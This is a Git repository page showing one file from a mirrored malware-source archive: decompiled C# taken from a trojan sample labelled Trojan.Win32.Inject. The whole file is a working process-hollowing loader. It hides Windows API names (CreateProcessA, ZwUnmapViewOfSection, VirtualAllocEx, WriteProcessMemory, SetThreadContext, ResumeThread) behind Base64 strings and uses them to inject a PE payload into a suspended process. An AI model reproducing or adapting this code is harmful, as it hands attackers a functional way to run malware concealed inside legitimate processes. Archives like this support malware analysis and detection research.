ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2025-01-12 13:25:30 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
f2ac1ece55
MalwareSourceCode/MSIL/Trojan/Win32/I/Trojan.Win32.Inject.echy-227c3fafebb1b2fb6e3ecabc01855dde70a017a840076a50939ff1c6af65afb8/lnrosxxr.cs
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

140 lines
7.8 KiB
C#
Raw Blame History

// Decompiled with JetBrains decompiler
// Type: lnrosxxr
// Assembly: sub, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 1EFA436E-F791-4E79-A4FC-753DBB8ECCD0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.Inject.echy-227c3fafebb1b2fb6e3ecabc01855dde70a017a840076a50939ff1c6af65afb8.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Runtime.InteropServices;
using System.Text;
[StandardModule]
internal sealed class lnrosxxr
{
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string QPRy);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr GetProcAddress(IntPtr XocgCC, [MarshalAs(UnmanagedType.VBByRefStr)] ref string VTHDGEi);
public static T xuenvoeckpvidziiu<T>(string name, string method) => (T) Marshal.GetDelegateForFunctionPointer(lnrosxxr.GetProcAddress(lnrosxxr.LoadLibraryA(ref name), ref method), typeof (T));
public static bool kdijxgxspauejyavprx(byte[] xsuiqqwrqeniwbwnz, string pgatylcppynhtbqgvu)
{
lnrosxxr.lnrosxxresclbnzeb lnrosxxresclbnzeb = lnrosxxr.xuenvoeckpvidziiu<lnrosxxr.lnrosxxresclbnzeb>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("Q3JlYXRlUHJvY2Vzc0E=")));
lnrosxxr.vwqyfungepvutuatxbzi vwqyfungepvutuatxbzi = lnrosxxr.xuenvoeckpvidziiu<lnrosxxr.vwqyfungepvutuatxbzi>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("R2V0VGhyZWFkQ29udGV4dA==")));
lnrosxxr.uhvycpyqufrlfzhglja uhvycpyqufrlfzhglja = lnrosxxr.xuenvoeckpvidziiu<lnrosxxr.uhvycpyqufrlfzhglja>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("UmVhZFByb2Nlc3NNZW1vcnk=")));
lnrosxxr.jxrvsgicziznszcjx jxrvsgicziznszcjx = lnrosxxr.xuenvoeckpvidziiu<lnrosxxr.jxrvsgicziznszcjx>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("VmlydHVhbEFsbG9jRXg=")));
lnrosxxr.eilqikeyqjujvfvkjnrd eilqikeyqjujvfvkjnrd = lnrosxxr.xuenvoeckpvidziiu<lnrosxxr.eilqikeyqjujvfvkjnrd>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("V3JpdGVQcm9jZXNzTWVtb3J5")));
lnrosxxr.nxxbhqnoostjpwpsz nxxbhqnoostjpwpsz = lnrosxxr.xuenvoeckpvidziiu<lnrosxxr.nxxbhqnoostjpwpsz>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("U2V0VGhyZWFkQ29udGV4dA==")));
lnrosxxr.sqiuwbybitiopbystw sqiuwbybitiopbystw = lnrosxxr.xuenvoeckpvidziiu<lnrosxxr.sqiuwbybitiopbystw>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("UmVzdW1lVGhyZWFk")));
lnrosxxr.soiyyrevooirbokub soiyyrevooirbokub = lnrosxxr.xuenvoeckpvidziiu<lnrosxxr.soiyyrevooirbokub>(Encoding.UTF8.GetString(Convert.FromBase64String("bnRkbGw=")), Encoding.UTF8.GetString(Convert.FromBase64String("WndVbm1hcFZpZXdPZlNlY3Rpb24=")));
bool flag;
try
{
IntPtr zero1 = IntPtr.Zero;
IntPtr[] poegrpgaokukwhbc = new IntPtr[4];
byte[] fjplrhicndhdizglrwr = new byte[68];
int int32_1 = BitConverter.ToInt32(xsuiqqwrqeniwbwnz, 60);
int int16 = (int) BitConverter.ToInt16(xsuiqqwrqeniwbwnz, checked (int32_1 + 6));
IntPtr gobjshapdwhffjwrqj = new IntPtr(BitConverter.ToInt32(xsuiqqwrqeniwbwnz, checked (int32_1 + 84)));
if (lnrosxxresclbnzeb((string) null, new StringBuilder(pgatylcppynhtbqgvu), zero1, zero1, false, 4, zero1, (string) null, fjplrhicndhdizglrwr, poegrpgaokukwhbc))
{
uint[] numArray1 = new uint[179];
numArray1[0] = 65538U;
if (vwqyfungepvutuatxbzi(poegrpgaokukwhbc[1], numArray1))
{
IntPtr iesuuhchynegvvzlqz = new IntPtr(checked ((long) numArray1[41] + 8L));
IntPtr zero2 = IntPtr.Zero;
IntPtr kgvischhvgphidni = new IntPtr(4);
IntPtr zero3 = IntPtr.Zero;
if (uhvycpyqufrlfzhglja(poegrpgaokukwhbc[0], iesuuhchynegvvzlqz, ref zero2, (int) kgvischhvgphidni, ref zero3) && soiyyrevooirbokub(poegrpgaokukwhbc[0], zero2) == 0U)
{
IntPtr num1 = new IntPtr(BitConverter.ToInt32(xsuiqqwrqeniwbwnz, checked (int32_1 + 52)));
IntPtr num2 = new IntPtr(BitConverter.ToInt32(xsuiqqwrqeniwbwnz, checked (int32_1 + 80)));
IntPtr dvjxepuaeohgthdhpei = jxrvsgicziznszcjx(poegrpgaokukwhbc[0], num1, num2, 12288, 64);
int int32_2 = dvjxepuaeohgthdhpei.ToInt32();
int sfztruhrredwfadfexn;
int num3 = eilqikeyqjujvfvkjnrd(poegrpgaokukwhbc[0], dvjxepuaeohgthdhpei, xsuiqqwrqeniwbwnz, checked ((uint) (int) gobjshapdwhffjwrqj), sfztruhrredwfadfexn) ? 1 : 0;
int num4 = checked (int16 - 1);
int num5 = 0;
while (num5 <= num4)
{
int[] dst = new int[10];
Buffer.BlockCopy((Array) xsuiqqwrqeniwbwnz, checked (int32_1 + 248 + num5 * 40), (Array) dst, 0, 40);
byte[] numArray2 = new byte[checked (dst[4] - 1 + 1)];
Buffer.BlockCopy((Array) xsuiqqwrqeniwbwnz, dst[5], (Array) numArray2, 0, numArray2.Length);
num2 = new IntPtr(checked (int32_2 + dst[3]));
num1 = new IntPtr(numArray2.Length);
int num6 = eilqikeyqjujvfvkjnrd(poegrpgaokukwhbc[0], num2, numArray2, checked ((uint) (int) num1), sfztruhrredwfadfexn) ? 1 : 0;
checked { ++num5; }
}
num2 = new IntPtr(checked ((long) numArray1[41] + 8L));
num1 = new IntPtr(4);
int num7 = eilqikeyqjujvfvkjnrd(poegrpgaokukwhbc[0], num2, BitConverter.GetBytes(dvjxepuaeohgthdhpei.ToInt32()), checked ((uint) (int) num1), sfztruhrredwfadfexn) ? 1 : 0;
numArray1[44] = checked ((uint) (dvjxepuaeohgthdhpei.ToInt32() + BitConverter.ToInt32(xsuiqqwrqeniwbwnz, int32_1 + 40)));
int num8 = nxxbhqnoostjpwpsz(poegrpgaokukwhbc[1], numArray1) ? 1 : 0;
}
}
int num = (int) sqiuwbybitiopbystw(poegrpgaokukwhbc[1]);
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
flag = false;
ProjectData.ClearProjectError();
goto label_11;
}
return true;
label_11:
return flag;
}
[return: MarshalAs(UnmanagedType.Bool)]
public delegate bool lnrosxxresclbnzeb(
string ietrditgqlkybeccz,
StringBuilder gisswaffbyrczcjbek,
IntPtr tddvzyuanpptiley,
IntPtr ycqlhnopsrfcrqntkq,
[MarshalAs(UnmanagedType.Bool)] bool eaujxngrghxreezr,
int jagdrflhlgcppngkw,
IntPtr qftzyqcyyhqalvcldis,
string bvdqwpklthusqazhws,
byte[] fjplrhicndhdizglrwr,
IntPtr[] poegrpgaokukwhbc);
public delegate bool eilqikeyqjujvfvkjnrd(
IntPtr hiknaiiqyqcrskcd,
IntPtr dvjxepuaeohgthdhpei,
byte[] rayhtovktvtpnqsprofv,
uint gobjshapdwhffjwrqj,
int sfztruhrredwfadfexn);
[return: MarshalAs(UnmanagedType.Bool)]
public delegate bool uhvycpyqufrlfzhglja(
IntPtr hpjvxhftkugsddeoaxrv,
IntPtr iesuuhchynegvvzlqz,
ref IntPtr aanqiibdlcdgsyaiuthg,
int kgvischhvgphidni,
ref IntPtr tnieryiajydgnfah);
public delegate IntPtr jxrvsgicziznszcjx(
IntPtr ptxvzenhfiyxjrukuiaa,
IntPtr gwsrduhhhelsotxpp,
IntPtr wscnyxncgrtvlwsjy,
int oykcpqvtqoonaicn,
int bsgijtjjdskoknjpk);
public delegate uint soiyyrevooirbokub(IntPtr pchcqqapnkhkylpkukd, IntPtr pbqsnhkivlaqctbphk);
public delegate uint sqiuwbybitiopbystw(IntPtr lcelxaicxuenriantqju);
[return: MarshalAs(UnmanagedType.Bool)]
public delegate bool vwqyfungepvutuatxbzi(IntPtr roayflzfrbzsjwfviu, uint[] gxhyqcduubsjikzqk);
[return: MarshalAs(UnmanagedType.Bool)]
public delegate bool nxxbhqnoostjpwpsz(IntPtr fxhcxwrwbwnndyrzoofq, uint[] idtsddwgyflpctwdc);
}
Reference in New Issue View Git Blame Copy Permalink